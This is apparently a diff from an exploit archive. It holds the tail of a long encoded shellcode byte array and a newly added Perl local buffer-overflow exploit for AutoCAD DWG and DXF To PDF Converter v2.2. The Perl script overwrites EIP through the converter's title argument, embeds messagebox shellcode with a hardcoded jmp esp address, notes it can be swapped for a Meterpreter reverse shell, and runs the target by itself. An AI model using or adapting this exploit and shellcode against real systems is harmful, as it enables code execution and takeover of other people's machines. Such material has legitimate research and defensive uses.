"\x8b\x3b\x4b\x4b\x49\xa1\x8f\x34\x4b\x4b\x4b\x64\x8b\x3b\x4b\x4b"
"\x49\xa9\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b\x49\x91\x8f\x34"
"\x4b\x4b\x4b\x6c\x8b\x3b\x4b\x4b\x49\x9d\x8f\x34\x4b\x4b\x4b\x68"
"\x8b\x3b\x4b\x4b\x4b\x53\x8f\x34\x4b\x4b\x4b\x54\x8b\x3b\x4b\x4b"
"\x4b\x55\x8f\x34\x4b\x4b\x4b\x50\x51\x37\x8f\x34\x4b\x4b\x4b\x52"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5e\xec\x4e\x4b\x5f"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\xe4\x8b\x5b\x4b\x4b"
"\x4b\x61\x8b\x3b\xb4\xb4\xb4\xac\x8f\x34\x4b\x4b\x4b\x6f\x8b\x3b"
"\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b\x4b\x6b\x8b\x3b\x4b\x4b\x49\xf8"
"\x8f\x34\x4b\x4b\x4b\x57\x8b\x3b\x4b\x4b\x4b\x50\x8f\x34\x4b\x4b"
"\x4b\x53\x51\x37\x8f\x34\x4b\x4b\x4b\x5d\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x59\xec\x4e\x4b\x5a\x4b\x4b\x4b\x4b\x4b\x5b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x53\xb7\x8f\x26\xb4\xb4"
"\xb4\xb3\xa7\x2c\x49\x1a\x4b\x35\x8f\xb6\x4b\x4b\x49\x3b\x8b\x5b"
"\x4b\x4b\x4b\x6a\x8b\x3b\xb4\xb4\xb4\xed\x8f\x34\x4b\x4b\x4b\x50"
"\x8b\x3b\x4b\x4b\x49\x13\x8f\x34\x4b\x4b\x4b\x5c\x8b\x3b\x4b\x4b"
"\x4b\x5d\x8f\x34\x4b\x4b\x4b\x58\x51\x37\x8f\x34\x4b\x4b\x4b\x5a"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x46\xec\x4e\x4b\x47"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\x08\x8b\x5b\x4b\x4b"
"\x4b\x7d\x8b\x3b\xb4\xb4\xb4\x3c\x8f\x34\x4b\x4b\x4b\x7b\x8b\x3b"
"\x4b\x4b\x4b\x62\x8f\x34\x4b\x4b\x4b\x67\x8b\x3b\x4b\x4b\x4b\x50"
"\x8f\x34\x4b\x4b\x4b\x63\x8b\x3b\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b"
"\x4b\x6f\x8b\x3b\x4b\x4b\x4b\x68\x8f\x34\x4b\x4b\x4b\x6b\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x57\xec\x4e\x4b\x50\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x5b\x49\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8b\xab\x4b\x4b\x4b\x47\x0a\x6b\x4b\x4f\x8f\x16\xb4\xb4"
"\xb4\xa7\xec\x23\x4b\x4c\xec\xbf\x4b\xba\xec\xa1\x4b\x59\x8f\x16"
"\x4b\x4b\x4a\xb2\xec\x23\x4b\x4d\xec\xbf\x4b\xa3\x8b\x1b\xb4\xb4"
"\xb4\x97\x8b\x3b\x4b\x4b\x4b\x47\xec\xae\x4b\x50\xec\xae\x4a\x22"
"\x8b\x1b\x4b\x4b\x4a\xa5\xec\xae\x4b\xc3\x8b\x1b\x4b\x4b\x4a\xa8"
"\x8b\x3b\xb4\xb4\xb4\xa5\xec\xae\x4b\x47\xec\xae\x4a\xce\x8b\xab"
"\xb4\xb4\xb4\xbd\x8b\x1b\xb4\xb4\xb4\x8b\xec\xbf\x4b\x3d\x8f\xb6"
"\x4b\x4b\x4a\x82\x53\x7c\x8f\xa4\x4b\x4b\x4a\xe4\x8b\x6b\x4b\x4b"
"\x4b\x07\x9c\x4c\x6b\x4b\x6b\x4b\x8b\x6b\x4b\x4b\x4b\x75\x9c\x44"
"\x6b\x4b\x6b\x4b\x8f\x14\x4b\x4b\x4b\x09\x8b\x5b\x4b\x4b\x4b\x74"
"\x8b\x3b\x4b\x4b\x4b\x79\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x7e\x8b\x3b\x4b\x4b\x4a\xd9\x8f\x34"
"\x4b\x4b\x4b\x7a\x8b\x3b\x4b\x4b\x4b\x55\x8f\x34\x4b\x4b\x4b\x66"
"\x8b\x3b\x4b\x4b\x4b\x69\x8f\x34\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x6e\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x6a\xec\x4e\x4b\x6b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xa6\x4b\x4b\x4a\x04\x53\x38\x53\xb2"
"\x8f\x26\xb4\xb4\xb4\xa1\xa7\x29\xab\x4b\x4b\xb5\xa7\x23\x3b\x4b"
"\xb4\xb5\xec\x4e\x4a\x7a\x8f\xb6\x4b\x4b\x4a\x1c\x8f\xa4\x4b\x4b"
"\x4a\x77\x8b\x5b\x4b\x4b\x4b\x7a\x8b\x3b\xb4\xb4\xb4\x85\x8f\x34"
"\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b\x4b\x6d\x8f\x34\x4b\x4b\x4b\x6c"
"\x8f\x14\x4b\x4b\x4b\x69\x8b\x3b\x4b\x4b\x4a\x60\x8f\x34\x4b\x4b"
"\x4b\x6b\x8b\x3b\xb4\xb4\xb4\x8a\x8f\x34\x4b\x4b\x4b\x57\x51\x37"
"\x8f\x34\x4b\x4b\x4b\x51\x51\x37\x8f\x34\x4b\x4b\x4b\x53\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5f\xec\x4e\x4b\x58\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xb2\x8f\x26\xb4\xb4\xb4\xbd\x53\xbd"
"\xa7\x23\x4b\xa9\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4a\x43\x8f\xa4"
"\x4b\x4b\x4b\xa0\x8b\x5b\x4b\x4b\x4b\x79\x53\x3a\x50\x37\x50\x37"
"\x50\x37\x8f\x14\x4b\x4b\x4b\x6e\x8f\x34\x4b\x4b\x4b\x63\x8f\x64"
"\x4b\x4b\x4b\x6a\x51\x37\x8f\x34\x4b\x4b\x4b\x68\x8f\x24\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x55\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x51\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x5d\xec\x4e\x4b\x5e\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xe2\x8f\x36\xb4\xb4\xb4\xbd\xa7\x33"
"\x4b\xd8\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4b\xf0\x8f\xa4\x4b\x4b"
"\x4b\xd7\x8b\x5b\x4b\x4b\x4b\x50\x53\x3a\x8f\x34\x4b\x4b\x4b\x5c"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5e\x51\x37\x8f\x34\x4b\x4b\x4b\x58"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5a\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x46\xec\x4e\x4b\x47\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x26"
"\xb4\xb4\xb4\xb2\xa7\x23\x4b\x2b\xb4\x35\x8f\x16\xb4\xb4\xb4\xa4"
"\x8f\x26\xb4\xb4\xb4\xa5\x8f\xa6\x4b\x4b\x4b\x2c\x4c\xb5\x8b\x5b"
"\xb4\xb4\xb5\xb0\x8f\x06\xb4\xb4\xb4\x4b\x8b\x6b\x4b\x4b\x4b\xcc"
"\xec\xc3\x4b\x5e\xa8\x7b\x5b\x4b\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4"
"\x52\x73\xec\x3f\x4b\x4d\xec\x23\x4b\xce\xec\xbf\x4b\x45\xa8\x1b"
"\x6b\x4b\x4b\x3d\x8b\x10\x4b\x4b\x4b\xb4\x51\x62\x51\x22\x52\x7e"
"\xec\x3f\xb4\xbc\x50\x22\x09\x2b\x5b\x4b\x51\x52\x50\x02\xec\x3f"
"\xb4\xa8\x4c\xb5\x8f\x06\xb4\xb4\xb5\x93\x8b\x5b\xb4\xb4\xb5\x86"
"\xec\xc3\x4b\xce\x8b\x6b\x4b\x4b\x4b\x11\x50\x62\xa8\x7b\x5b\x4b"
"\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4\x52\x73\xec\x3f\x4b\x4d\xec\x73"
"\x4b\x2e\xec\xbf\x4b\x42\x51\x68\xa8\x7b\x6b\x4b\x4b\x3d\x8b\x70"
"\x4b\x4b\x4b\xb4\x09\x7b\x5b\x4b\x51\x52\x50\x02\xec\x3f\xb4\xaf"
"\x4c\xb5\x5c\xb4\x8b\x0b\x4b\x4b\x4b\x5b\x1b\xbb\x0b\x4b\x13\x9b"
"\x0b\x4f\xd3\xa7\x9b\x47\x8b\x0b\x4b\x4b\x4b\x4c\x13\xbb\x0b\x4b"
"\x4c\xb5\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4a\x18\x78\xf7\x4a\x18\x78\xef"
"\x4a\x18\x7c\x5b\x4a\x18\x7d\x7d\x4a\x18\x7d\x23\x4a\x18\x7d\x6f"
"\x4a\x18\x78\x55\x4a\x18\x78\xc1\x4a\x18\x79\x07\x4a\x18\x78\x4d"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x49\x49\x7b\x72\x4b\x4b\x4b\x4b\x01\x02\x03\x9c\x09\x86\x7f\x97"
"\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x9d\x0a\x08\x87\x18"
"\x19\x92\x8f\x1c\x1d\x1e\x1f\x80\x81\x82\x83\x84\x85\x17\x1b\x88"
"\x89\x8a\x8b\x8c\x05\x06\x07\x90\x91\x16\x93\x94\x95\x96\x04\x98"
"\x99\x9a\x9b\x14\xff\x9e\x1a\x20\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7"
"\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26\xe9\xea\xeb\xe8\xed\xee\xef\xec"
"\xdf\x21\x24\x2a\x29\x3b\x5e\x2d\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7"
"\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc"
"\x60\x3a\x23\x40\x27\x3d\x22\xd8\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71"
"\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5\x7e\x73\x74\x75\x76\x77\x78\x79"
"\x7a\xa1\xbf\xd0\x5b\xde\xae\xac\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd"
"\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51"
"\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c\xf7\x53\x54\x55\x56\x57\x58\x59"
"\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30\x31\x32\x33\x34\x35\x36\x37\x38"
"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0";

20
platforms/win64/dos/38085.pl Executable file
View file

File diff suppressed because one or more lines are too long

48
platforms/windows/local/38087.pl Executable file
View file

@ -0,0 +1,48 @@
#*************************************************************************************************************
#
# Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow
# Date: 9-5-2015
# Software Link: http://www.verypdf.com/autocad-dwg-dxf-to-pdf/dwg_dxf_to_pdf_setup.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter passed into the program that specifies the title of the converted PDF is vulnerable to a buffer overflow.
# This can be exploited using EIP direct overwrite, SEH bypass, and ROP.
# EIP was easier and afforded more universal exploitation so I went that route after SEH bypass limited the exploit's universal OS compatibility
# Enjoy! (Proofs included)
#
# Instructions: Run this as-is (if on x64 platform) and hit the [try] button when the program opens.
#
#**************************************************************************************************************
#standard messagebox shellcode.
#Adapts readily to windows/meterpreter/reverse_tcp using msfvenom --smallest
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
open(myfile,'>crasher.dwf'); #generate the dummy DWF file
print myfile "yattayattayatta"; #gibberish to go in file
close (myfile); #close the file
$sploit=pack('V',0x100126db); #jmp esp specific to Windows 7 x64 [found within the packed section of the executable :) ]
$cmd='"C:\\Program Files (x86)\\AutoCAD DWG and DXF To PDF Converter v2.2\\dwg2pdf.exe"'; #change this if you are on a 32-bit based processor
$cmd .= ' -t "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAargvbhewthvboiwetuhnvoehntoeqothnogobtehnvohjnoeqhngovenhjotgvnoehnogveoqnvobeqntgoh2io4gh894gh942h9gth249h92hg49h2g9h429gh4g9h429hg9th4g9h489gh849hg894h982hg984hg98h4298hg9842hg8942hg8942h298hg4298hg8942hg894hg9hg398gh78358h35g3h8352g8h32h5g8v3ig25bgb3958v938g983h98g3h9gh3259hg3529gh93vbh98v893hg89h5329g8h3598gth93vb583gfb9358fb929b3g29b8g25389bg2538b9g5238b952g38bg925gb28958b925v89bcc88r2cxnbx2rnb982c552b89c25vb8725vg852v8528g52g8258787g5g87253g8723487gfc32g87c23g78c23g78cg387cg7823c2g837cg738cg7853S25hg532gfh3295g8h83295gtf352tu539t8u3529tg5938gt932ut235yt9235yt98325yt92358yv8935vy8953vy5239vy293v8y352v98y32895vy9352yv932yv9y329vy239vy9325y298fy92358fy9253fn53ngj25ngn53n53ngln235lgn2l35ngl235ng3ljnghln3hg239hbu390gu23905ug935guy92835ut893ug9u39gvu935ugvb8953u938ug9835y2395fy2398fy9325fy9325yf932yf9y2359f2359fy2395vy598vy5392vy2395vy3295yv9358yv39258vy9238yv9235hgt9h23g59h23';
$cmd .= $sploit;
$cmd .= $shellcode;
$cmd .= '" -i crasher.dwf -o test.pdf'; # append our arguments to the end
system($cmd);